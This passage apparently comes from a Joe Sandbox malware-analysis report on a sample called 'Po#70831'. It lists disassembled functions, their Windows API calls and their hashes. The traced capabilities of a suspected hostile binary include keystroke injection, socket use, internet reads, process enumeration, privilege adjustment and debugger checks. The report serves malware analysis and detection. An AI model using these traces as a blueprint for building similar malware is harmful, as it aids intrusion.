                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                      • String ID: *.*
                                      • API String ID: 1972594611-438819550
                                      • Opcode ID: 45b94f8330abf21f15c3968f1a535bf4da5fce3b435719810fc05333e504c78d
                                      • Instruction ID: 8821f05f9ef129409c602b85748b55d8721d30361c6bd87d19aaa6bca88338d1
                                      • Opcode Fuzzy Hash: 45b94f8330abf21f15c3968f1a535bf4da5fce3b435719810fc05333e504c78d
                                      • Instruction Fuzzy Hash: 47415C7190420A9FDF14EF65C889AEEBFB8FF15310F24416AE805A21D6EB309E44CF65
                                      Function 004A997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 004A9A4E
                                      • GetSysColor.USER32(0000000F), ref: 004A9B23
                                      • SetBkColor.GDI32(?,00000000), ref: 004A9B36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Color$LongProcWindow
                                      • String ID:
                                      • API String ID: 3131106179-0
                                      • Opcode ID: fbebd449faaba922a81e13b4463329a9d272dd281dde479723d8e8388b56148a
                                      • Instruction ID: 6c7ef22377e9ebcab710b3195db5ab15d89b0b71a8c9190e3b8fdbff438e00c2
                                      • Opcode Fuzzy Hash: fbebd449faaba922a81e13b4463329a9d272dd281dde479723d8e8388b56148a
                                      • Instruction Fuzzy Hash: 51A10A70208494BEE7249A3D9C48E7B3A9DEFA7365F18410BF502C67D1CA6D9D02D27E
                                      Function 00511806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0051304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0051307A
                                        • Part of subcall function 0051304E: _wcslen.LIBCMT ref: 0051309B
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0051185D
                                      • WSAGetLastError.WSOCK32 ref: 00511884
                                      • bind.WSOCK32(00000000,?,00000010), ref: 005118DB
                                      • WSAGetLastError.WSOCK32 ref: 005118E6
                                      • closesocket.WSOCK32(00000000), ref: 00511915
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 1601658205-0
                                      • Opcode ID: 9c6e4cdcd95b7e5bdfae3514f5afc6817b90e3994b1e9159e433dce252203f5a
                                      • Instruction ID: e271870b33c5bd71947091e4b57b25ebc1f8f1ccfa7b9ae35f9a44cf637084c6
                                      • Opcode Fuzzy Hash: 9c6e4cdcd95b7e5bdfae3514f5afc6817b90e3994b1e9159e433dce252203f5a
                                      • Instruction Fuzzy Hash: 7E51C571A00200AFEB10AF24C886F6A7BE5AF49718F04C49DF9165F3D3D775AD418BA5
                                      Function 00521C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: f5ade1396509eeded04edfef6886d85995725112c48288033b737163688643f2
                                      • Instruction ID: 10743eeb4addb42a4d2165cc40e4c485af376375bacd4817cc8f26cebec62498
                                      • Opcode Fuzzy Hash: f5ade1396509eeded04edfef6886d85995725112c48288033b737163688643f2
                                      • Instruction Fuzzy Hash: 9A21D8357409215FD7208F1AE884B2B7FA5FFA6314F19806CE4469B392C771EC42CB98
                                      Function 00498060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: e9d12fec5db05da9f87864c184b5ff7f6947d7b34a35373d445489ec1babcbb1
                                      • Instruction ID: 5d4ddf3c8a12e43265baf812286c22c39d21101100d7eca1651eaf342fe8b3ca
                                      • Opcode Fuzzy Hash: e9d12fec5db05da9f87864c184b5ff7f6947d7b34a35373d445489ec1babcbb1
                                      • Instruction Fuzzy Hash: 70A28F70E0021ACBDF24CF58C9507AEBBB1BF55314F2581ABD815AB385EB389D81CB59
                                      Function 004F8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004F82AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($tbU$|
                                      • API String ID: 1659193697-2723325640
                                      • Opcode ID: 61991ec9e40432dbd57cf71560c443426d366a2bc67bbf6646150837fa9c90b9
                                      • Instruction ID: a889b78a5bfc63625c7fbcb8b08fd5ebc7840f51b5d84aba8723db3fdcce92b4
                                      • Opcode Fuzzy Hash: 61991ec9e40432dbd57cf71560c443426d366a2bc67bbf6646150837fa9c90b9
                                      • Instruction Fuzzy Hash: 61325574A007099FCB28CF19C481A6AB7F0FF48710B15C46EE99ADB3A1EB74E941CB44
                                      Function 0051A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0051A6AC
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0051A6BA
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0051A79C
                                      • CloseHandle.KERNEL32(00000000), ref: 0051A7AB
                                        • Part of subcall function 004ACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,004D3303,?), ref: 004ACE8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                      • String ID:
                                      • API String ID: 1991900642-0
                                      • Opcode ID: 90254969e3a513f4cb001163bb377dfc3a668ac4e8236082d4710fe1257f0ff2
                                      • Instruction ID: 385aa273bc2e90efd0d22997839e01c5ad8946845dbcf3461feb4b87cbc8c829
                                      • Opcode Fuzzy Hash: 90254969e3a513f4cb001163bb377dfc3a668ac4e8236082d4710fe1257f0ff2
                                      • Instruction Fuzzy Hash: C7514D71508300AFD710EF25C886A6FBBE8FF99758F40492EF58597292EB34D904CB96
                                      Function 004FAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004FAAAC
                                      • SetKeyboardState.USER32(00000080), ref: 004FAAC8
                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004FAB36
                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004FAB88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 6edf632351eb18d4733d799f4d7b6dc7a4c1231dc64d6a3d385c98d3e3b09609
                                      • Instruction ID: 0328b4b491bd7858bd17e866854a8f7c39e42966daa50045666774bb0b64acde
                                      • Opcode Fuzzy Hash: 6edf632351eb18d4733d799f4d7b6dc7a4c1231dc64d6a3d385c98d3e3b09609
                                      • Instruction Fuzzy Hash: F8312CB0A4020CAEFB31CA65CC057FB7BA6AF45310F04421BE389552D1D37CA965D76B
                                      Function 0050CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0050CE89
                                      • GetLastError.KERNEL32(?,00000000), ref: 0050CEEA
                                      • SetEvent.KERNEL32(?,?,00000000), ref: 0050CEFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorEventFileInternetLastRead
                                      • String ID:
                                      • API String ID: 234945975-0
                                      • Opcode ID: 08e7b18ea25add0b2301706664297edd00778b2c4f17cbd3be2e33db2cba6f1e
                                      • Instruction ID: f12b8ad0d8dc45ea7730fdb72c3727c0d162e0cead0d212d12aee2cdac3faf67
                                      • Opcode Fuzzy Hash: 08e7b18ea25add0b2301706664297edd00778b2c4f17cbd3be2e33db2cba6f1e
                                      • Instruction Fuzzy Hash: C021DC71500705ABD731CFA5C948BAA7FFCFF52318F204A2EE646D2191E734EA099B64
                                      Function 004C2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 004C271A
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004C2724
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 004C2731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: eec12339e42e9eb67df8d10764fc45a77ede46e8d256249b012ecb72acf67f03
                                      • Instruction ID: f214e19b56410db1da69eff9f21d43b0b7b3452ac028b715dc1e7c747957100b
                                      • Opcode Fuzzy Hash: eec12339e42e9eb67df8d10764fc45a77ede46e8d256249b012ecb72acf67f03
                                      • Instruction Fuzzy Hash: 7D31F5749013189BCB21DF68DD88BDDBBB8AF18310F1045EAE81CA7261E7749F858F58
                                      Function 005051CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 005051DA
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00505238
                                      • SetErrorMode.KERNEL32(00000000), ref: 005052A1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: e6433ec7a6b5fe1eabf898855532b5dff9a1c9669fcef558bb33c2ed4e9874e0
                                      • Instruction ID: 0f7c1b879ffc44e319068490b8a5992c6a05973f97331d8e7259ea0cb89c7370
                                      • Opcode Fuzzy Hash: e6433ec7a6b5fe1eabf898855532b5dff9a1c9669fcef558bb33c2ed4e9874e0
                                      • Instruction Fuzzy Hash: C0317F35A00608DFDB00DF55D885EAEBFB4FF09318F048099E805AB392DB35E85ACB50
                                      Function 004F16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 004B0668
                                        • Part of subcall function 004AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 004B0685
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F170D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F173A
                                      • GetLastError.KERNEL32 ref: 004F174A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                      • String ID:
                                      • API String ID: 577356006-0
                                      • Opcode ID: e9d4a591c0d21c39dbfceee70c684ece1061e099cad4eb63a76b730a8aabd9e7
                                      • Instruction ID: bba15c3db5ea40fb6211ab2fe553d7dd2bad4ce8c360e68ae775b82824df162e
                                      • Opcode Fuzzy Hash: e9d4a591c0d21c39dbfceee70c684ece1061e099cad4eb63a76b730a8aabd9e7
                                      • Instruction Fuzzy Hash: BD11C1B2400308EFE728EF54DC86D6FBBF9EF05714B20852EE05653251EB74BC468A64
                                      Function 004FD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004FD608
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004FD645
                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004FD650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: 920343edbce51329f44480e3955c8b6928f17cfa980abfa419d1c6cd6e6a3313
                                      • Instruction ID: ab15826d29d9011a180bcaf414f3e337b20a34a84ec7a711444dc7f026013750
                                      • Opcode Fuzzy Hash: 920343edbce51329f44480e3955c8b6928f17cfa980abfa419d1c6cd6e6a3313
                                      • Instruction Fuzzy Hash: 1F11A175E01228BFEB208F94DC45FAFBFBCEB45B60F108112F904E7290C6704A058BA1
                                      Function 004F1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004F168C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004F16A1
                                      • FreeSid.ADVAPI32(?), ref: 004F16B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: fe7e20fff0bbf3db408df499b6339602876f855bcb61f83be81c8165a45e794a
                                      • Instruction ID: 8c36f08451b4652d8bd7eceac852d61686817e64ead0b2048b1e577dc8f5c7f5
                                      • Opcode Fuzzy Hash: fe7e20fff0bbf3db408df499b6339602876f855bcb61f83be81c8165a45e794a
                                      • Instruction Fuzzy Hash: 38F0F47195030DFBEB00DFE49C89EAEBBBCFF08644F504565E501E2191E774AA489A54
                                      Function 004B4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(004C28E9,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002,00000000,?,004C28E9), ref: 004B4D09
                                      • TerminateProcess.KERNEL32(00000000,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002,00000000,?,004C28E9), ref: 004B4D10
                                      • ExitProcess.KERNEL32 ref: 004B4D22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
